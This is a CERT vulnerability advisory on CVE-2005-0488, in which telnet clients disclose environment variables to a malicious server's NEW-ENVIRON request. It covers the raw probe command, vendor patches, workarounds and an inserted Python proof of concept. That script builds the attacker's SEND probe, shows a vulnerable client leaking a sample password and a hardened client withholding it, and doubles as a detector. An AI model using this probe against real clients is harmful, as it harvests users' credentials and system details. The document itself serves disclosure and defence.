CERT Vulnerability Note VU#800829

Telnet Client Information Disclosure Vulnerability

Original release date: June 14, 2005
Source: www.kb.cert.org

CVSS2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE

EPSS: 0.888 (98.7th percentile)

Overview

A vulnerability in the handling of the NEW-ENVIRON command allows a malicious telnet server to gain information from a client’s environment variables.

Description

The Telnet network protocol is described in RFC854 and RFC855 as a general, bi-directional communications facility. The Telnet protocol is commonly used for command-line login sessions between Internet hosts.

The vulnerability is in the NEW-ENVIRON suboption, which is the mechanism used for passing environment information between a telnet client and server. Use of this mechanism enables a telnet user to propagate configuration information to a remote host when connecting. Please see RFC1572 for more information. As specified in section 3 of RFC1572, the expected default behavior is "that there will not be any exchange of environment information". The flaw is that vulnerable clients answer a server's request for an arbitrary named variable, rather than only for variables the user chose to export.

In order to exploit this vulnerability, a malicious server can send a connected client the following telnet command:

    SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE

Vulnerable telnet clients will send back the value of the referenced environment variable. Environment variables may contain a variety of information, such as the local username, executable file search paths, locations of sensitive data, and other potentially sensitive details about the client computer.
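The exchange described above, as an added example that is not code from the CERT note or from any vendor's telnet client: the server-side SEND probe is built byte for byte per RFC 1572, the client's IS reply is parsed (including the ESC and doubled-IAC escaping the RFCs require), and the behaviour of an unpatched client is contrasted with a hardened one. The protocol constants are the real RFC 854/1572 values; the allow-list EXPORTABLE, the SAMPLE_ENV contents and all function names are assumptions made for the demonstration, and the hardened variant's policy (only explicitly exported names are ever disclosed) is an assumed design, not a description of any particular vendor's patch.

```python
"""Telnet NEW-ENVIRON (RFC 1572) probe builder and client responder.
Added example, not code from the CERT note or any vendor's telnet client.
Protocol constants follow RFC 854/1572; EXPORTABLE and SAMPLE_ENV are assumptions."""
IAC, SB, SE = 255, 250, 240            # RFC 854 command bytes
NEW_ENVIRON = 39                        # option code (RFC 1572)
IS, SEND = 0, 1                         # suboption commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3   # field types
_TYPES = (VAR, VALUE, USERVAR)

def _escape(raw: bytes) -> bytes:
    """Prefix field-type bytes (and ESC itself) with ESC and double IAC, per RFC 1572/854."""
    out = bytearray()
    for b in raw:
        if b in _TYPES or b == ESC:
            out.append(ESC)
        elif b == IAC:
            out.append(IAC)
        out.append(b)
    return bytes(out)

def build_send_probe(names) -> bytes:
    """Server -> client: IAC SB NEW-ENVIRON SEND USERVAR <name> ... IAC SE."""
    frame = bytearray([IAC, SB, NEW_ENVIRON, SEND])
    for name in names:
        frame += bytes([USERVAR]) + _escape(name)
    return bytes(frame + bytes([IAC, SE]))

def build_is_reply(triples) -> bytes:
    """Client -> server: IAC SB NEW-ENVIRON IS (type name VALUE value)... IAC SE."""
    frame = bytearray([IAC, SB, NEW_ENVIRON, IS])
    for kind, name, value in triples:
        frame += bytes([kind]) + _escape(name) + bytes([VALUE]) + _escape(value)
    return bytes(frame + bytes([IAC, SE]))

def _unframe(frame: bytes) -> bytes:
    """Strip IAC SB NEW-ENVIRON ... IAC SE and collapse doubled IAC bytes."""
    if frame[:3] != bytes([IAC, SB, NEW_ENVIRON]) or frame[-2:] != bytes([IAC, SE]):
        raise ValueError("not a NEW-ENVIRON subnegotiation")
    return frame[3:-2].replace(bytes([IAC, IAC]), bytes([IAC]))

def _fields(payload: bytes):
    """Split a SEND/IS body into (type, data) pairs, honouring ESC."""
    fields, i = [], 0
    while i < len(payload):
        kind, i = payload[i], i + 1
        if kind not in _TYPES:
            raise ValueError("malformed field type %d" % kind)
        data = bytearray()
        while i < len(payload) and payload[i] not in _TYPES:
            if payload[i] == ESC:           # escaped byte: take the next one literally
                if i + 1 >= len(payload):
                    raise ValueError("dangling ESC")
                data.append(payload[i + 1]); i += 2
            else:
                data.append(payload[i]); i += 1
        fields.append((kind, bytes(data)))
    return fields

def parse_send_probe(frame: bytes):
    """(VAR|USERVAR, name) pairs the server asked for."""
    payload = _unframe(frame)
    if not payload or payload[0] != SEND:
        raise ValueError("not a SEND")
    names = _fields(payload[1:])
    if any(kind == VALUE for kind, _ in names):
        raise ValueError("SEND must not carry VALUE")
    return names

def parse_is_reply(frame: bytes) -> dict:
    """name -> value the client disclosed; a name with no VALUE means 'undefined'."""
    payload = _unframe(frame)
    if not payload or payload[0] != IS:
        raise ValueError("not an IS")
    fields, result, i = _fields(payload[1:]), {}, 0
    while i < len(fields):
        kind, name = fields[i]; i += 1
        if kind == VALUE:
            raise ValueError("VALUE without a name")
        if i < len(fields) and fields[i][0] == VALUE:
            result[name] = fields[i][1]; i += 1
    return result

def answer_vulnerable(probe: bytes, environ: dict) -> bytes:
    """Unpatched client: returns any requested variable that happens to be set."""
    return build_is_reply([(k, n, environ[n]) for k, n in parse_send_probe(probe) if n in environ])

# Assumed allow-list for the hardened client: only explicitly exported names leave the host.
EXPORTABLE = frozenset([b"USER", b"DISPLAY", b"PRINTER"])

def answer_hardened(probe: bytes, environ: dict, exportable=EXPORTABLE) -> bytes:
    """Patched client: silently drop every requested name outside the allow-list."""
    return build_is_reply([(k, n, environ[n]) for k, n in parse_send_probe(probe)
                           if n in exportable and n in environ])

# Constructed environment of a victim workstation; not real data.
SAMPLE_ENV = {b"USER": b"alice", b"PATH": b"/home/alice/bin:/usr/bin", b"DB_PASSWORD": b"hunter2"}

if __name__ == "__main__":
    probe = build_send_probe([b"PATH", b"DB_PASSWORD", b"USER"])
    print("leaked by unpatched client:", parse_is_reply(answer_vulnerable(probe, SAMPLE_ENV)))
    print("leaked by patched client  :", parse_is_reply(answer_hardened(probe, SAMPLE_ENV)))
```

Run stand-alone, the script shows the unpatched responder handing back PATH and DB_PASSWORD to a server that merely asked for them by name, while the hardened responder discloses only USER. The same parse_send_probe function, pointed at captured server-to-client traffic, is also a usable detector: any SEND that names a USERVAR outside the set a client is configured to export is the probe this note describes.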

Please note that telnet functionality is embedded in many applications, not just in operating system distributions, so affected software is not limited to the system telnet binary.

The iDefense Security Advisory contains additional information about affected and unaffected vendors.


Impact

An attacker may be able to gather information about remote systems and the users who connect to the attacker's malicious telnet server. The attacker would have to trick a victim into initiating a telnet connection using a vulnerable client. This may be accomplished with an HTML-rendered email or web page that uses the TELNET:// URI handler, although further user interaction may be required.


Solution

Apply an update from your vendor

Patches, updates, and fixes should be available from multiple vendors.


Workarounds
Disable access to telnet, limit the use of telnet to trusted sites, and/or encourage the use of more secure remote connection clients.

On Unix systems it might be viable to remove execute permission from telnet and other binaries that perform telnet.

On Windows systems, changing or removing the registry key entry HKEY_CLASSES_ROOT\telnet\shell\open\command should reduce the likelihood of successful automatic exploitation attempts, such as those using telnet URLs.

Note these workarounds do not address the underlying vulnerability.


Vendor Information


Microsoft Corporation: Affected

Updated: June 14, 2005

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Microsoft has issued patches in relation to this vulnerability, for more information see Microsoft Security Bulletin MS05-033:

<http://www.microsoft.com/technet/security/bulletin/MS05-033.mspx>

If you have feedback, comments, or additional information about this vulnerability, please send us email (subject: VU#800829 Feedback).

Red Hat Inc.: Affected

Updated: July 28, 2005

Status

Affected

Vendor Statement

Vendor Statement: Red Hat, Inc

Updates are available for Red Hat Enterprise Linux 2.1, 3 and 4 to correct
this issue. New telnet and Kerberos packages along with our advisory are
available at the URL below and by using the Red Hat Network ‘up2date’ tool.

<http://rhn.redhat.com/errata/CAN-2005-0488.html>

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Red Hat Inc. has released a security update in relation to this issue:
<https://rhn.redhat.com/errata/RHSA-2005-504.html>


Sun Microsystems Inc.: Affected

Updated: June 14, 2005

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

Sun Microsystems have issued two Sun(sm) Alert Notifications in relation to this vulnerability including workaround and patch information. For more information please see:

<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57755-1>
<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1>



Acknowledgements

Gaël Delalleau is credited with this discovery. Thank you to iDefense for coordinating the release of information about this issue.

This document was written by Robert Mead based on information in the iDefense Security Advisory.

Other Information

CVE IDs: CVE-2005-0488
Severity Metric: 0.17
Date Public: June 14, 2005
